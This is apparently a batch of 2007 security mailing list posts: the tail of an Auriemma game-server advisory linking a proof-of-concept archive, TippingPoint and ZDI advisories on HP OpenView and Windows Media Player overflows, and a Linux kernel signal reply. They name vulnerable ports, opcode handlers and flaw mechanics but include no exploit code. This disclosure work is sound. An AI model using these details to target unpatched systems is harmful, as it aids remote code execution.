Another interesting thing is that the sender of the chat messages is
specified by the client, so it is possible to spoof any message.


###

===
3) The Code
===


http://aluigi.org/poc/bv2x.zip


###

==
4) Fix
==


I posted the details of the bugs on dev.baboviolent.net about ten
days ago but nobody has done anything.


###


--- 
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org


TPTI-07-14: HP OpenView Multiple Product Shared Trace Service Stack Overflow Vulnerabilities

2007-08-14 Thread TSRT
TPTI-07-14: HP OpenView Multiple Product Shared Trace Service Stack
Overflow Vulnerabilities
http://dvlabs.tippingpoint.com/advisory/TPTI-07-14
August 14, 2007

-- CVE ID:
CVE-2007-1676

-- Affected Vendor:
Hewlett-Packard

-- Affected Products:
HP OpenView Internet Service
HP OpenView Performance Manager
HP OpenView Performance Agent
HP OpenView Reporter
HP OpenView Operations
HP OpenView Operations Manager for Windows
HP OpenView Service Quality Manager
HP OpenView Network Node Manager
HP OpenView Business Process Insight and Related Products
HP OpenView Dashboard
HP OpenView Performance Insight


-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since August 14, 2007 by Digital Vaccine protection
filter ID 4787. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
These vulnerabilities allow remote attackers to execute arbitrary code
on vulnerable installations of multiple Hewlett-Packard (HP) OpenView
products, including: Performance Manager, Performance Agent, Reporter,
Operations, Operations Manager, Service Quality Manager, Network Node
Manager, Business Process Insight, Dashboard and Performance Insight.
Authentication is not required to exploit these vulnerabilities.

The specific flaws exist within the OpenView Shared Trace Service, a
service that is distributed with multiple products as ovtrcsvc.exe and
OVTrace.exe. The vulnerable service may be found bound to TCP port 5053
(ovtrcsvc.exe) or TCP port 5051 (OVTrace.exe). Specially crafted data
through opcode handlers 0x1a and 0x0f can result in arbitrary code
execution under the context of the SYSTEM user.

-- Vendor Response:
Hewlett-Packard has issued updates to correct this vulnerability. More
details can be found at:

http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01106515
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109171
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109584
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109617
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01110576
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01110627
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c0851
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01112038
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01114023
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01114156
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01115068

-- Disclosure Timeline:
2006.10.10 - Vulnerability reported to vendor
2007.08.14 - Digital Vaccine released to TippingPoint customers
2007.08.14 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, Pedram Amini and
Aaron Portnoy of TippingPoint DVLabs.



Re: COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

2007-08-14 Thread Wojciech Purczynski

> I'm not sure this is a real security issue. If some process has the same
> effective UID as the given one, the former can always send any signal to
> the latter. Thus the behaviour you described is IMHO normal.

It becomes a security issue whenever a suid process drops the user's UIDs.


ZDI-07-046: Microsoft Windows Media Player Skin Parsing Size Mismatch Heap Overflow Vulnerability

2007-08-14 Thread zdi-disclosures
ZDI-07-046: Microsoft Windows Media Player Skin Parsing Size Mismatch
Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-046.html
August 14, 2007

-- CVE ID:
CVE-2007-3037

-- Affected Vendor:
Microsoft

-- Affected Products:
Windows Media Player 7.1
Windows Media Player 9
Windows Media Player 10
Windows Media Player 11

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since August 14, 2007 by Digital Vaccine protection
filter ID 5535. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows Media Player. User
interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.

The specific flaw exists during the parsing of malformed skin files
(WMZ). A mismatch between the compressed and decompressed sizes can
result in an under-allocated heap buffer, which can be leveraged by an
attacker to eventually execute arbitrary code under the context of the
current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS07-047.mspx

-- Disclosure Timeline:
2007.03.19 - Vulnerability reported to vendor
2007.08.14 - Digital Vaccine released to TippingPoint customers
2007.08.14 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Piotr Bania.



ZDI-07-047: Microsoft Windows Media Player Malformed Skin Header Code Execution Vulnerability

2007-08-14 Thread zdi-disclosures
ZDI-07-047: Microsoft Windows Media Player Malformed Skin Header Code
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-047.html
August 14, 2007

-- CVE ID:
CVE-2007-3035

-- Affected Vendor:
Microsoft

-- Affected Products:
Windows Media Player 7.1
Windows Media Player 9
Windows Media Player 10
Windows Media Player 11

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows Media Player. User
interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.

The specific flaw exists while decompressing skin files (.WMZ and .WMD)
with malformed headers. During this process the malformed values are
used to improperly calculate data which can later allow an attacker to
execute code under the rights of the current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS07-047.mspx

-- Disclosure Timeline:
2007.05.22 - Vulnerability reported to vendor
2007.08.14 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Piotr Bania.
